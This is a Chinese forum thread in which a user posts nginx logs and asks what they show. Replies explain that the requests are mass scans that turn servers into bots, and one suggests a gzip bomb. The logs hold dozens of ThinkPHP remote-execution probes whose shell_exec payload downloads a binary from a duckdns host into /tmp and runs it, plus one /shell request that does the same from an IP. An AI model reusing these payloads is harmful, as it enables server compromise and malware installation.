RT,下面是 nginx 日志
42.116.132.217 - - [03/Feb/2020:04:46:21 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
95.56.46.16 - - [03/Feb/2020:04:51:17 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
42.115.154.162 - - [03/Feb/2020:04:56:31 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
42.113.229.201 - - [03/Feb/2020:04:56:57 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
42.117.213.8 - - [03/Feb/2020:05:12:56 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
183.80.226.167 - - [03/Feb/2020:05:43:14 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
1.54.51.37 - - [03/Feb/2020:06:43:59 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
183.81.106.253 - - [03/Feb/2020:06:46:19 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
176.163.32.15 - - [03/Feb/2020:07:16:57 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
189.154.64.227 - - [03/Feb/2020:08:27:51 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
41.248.244.123 - - [03/Feb/2020:09:46:58 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
95.58.245.64 - - [03/Feb/2020:10:01:27 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
1.54.146.50 - - [03/Feb/2020:11:44:40 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
42.113.211.238 - - [03/Feb/2020:12:02:09 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
42.118.70.112 - - [03/Feb/2020:12:41:39 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
118.68.197.228 - - [03/Feb/2020:12:56:56 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
42.117.137.217 - - [03/Feb/2020:13:08:34 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
60.24.45.148 - - [03/Feb/2020:13:39:36 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
58.186.78.50 - - [03/Feb/2020:13:46:47 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
118.71.4.28 - - [03/Feb/2020:15:07:50 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
1.53.177.26 - - [03/Feb/2020:15:08:30 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
61.220.75.34 - - [03/Feb/2020:15:40:00 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
207.216.89.109 - - [03/Feb/2020:16:19:00 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
42.114.189.116 - - [03/Feb/2020:17:52:09 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
61.80.151.145 - - [03/Feb/2020:18:04:37 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Unstable/2.0"
74.80.28.217 - - [03/Feb/2020:18:25:37 +0800] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 575 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
190.122.112.58 - - [03/Feb/2020:18:40:04 +0800] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://zxcxffyttygbbgfgf12121bot.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 400 173 "-" "Karu/2.0"
1
bosskwei 2020-02-03 19:16:38 +08:00 1
批量扫肉鸡的,挂 shell
|
2
opengps 2020-02-03 19:19:18 +08:00 via Android
找你漏洞,注入它代码
|
3
virusdefender 2020-02-03 19:45:28 +08:00
thinkphp 的漏洞扫描器
|
4
OllyDebug 2020-02-03 19:48:40 +08:00 via iPhone
漏洞扫描
|
5
xiri 2020-02-03 20:10:06 +08:00
全网批量扫描的,不一定是针对你,扫到了就挂上 shell 成肉鸡了
|
6
ysc3839 2020-02-04 06:17:28 +08:00 via Android 3
你的网站如果不用 PHP 的话,可以考虑遇到 请求 .php 文件的时候返回一个 gzip 炸弹。
gzip 炸弹意思是把很大的空白数据用 gzip 压缩,压缩后会变得很小,如果客户端会自动解压 gzip 的话就会消耗大量内存,很有可能崩溃。 |
9
ysc3839 2020-02-04 18:35:32 +08:00 via Android
|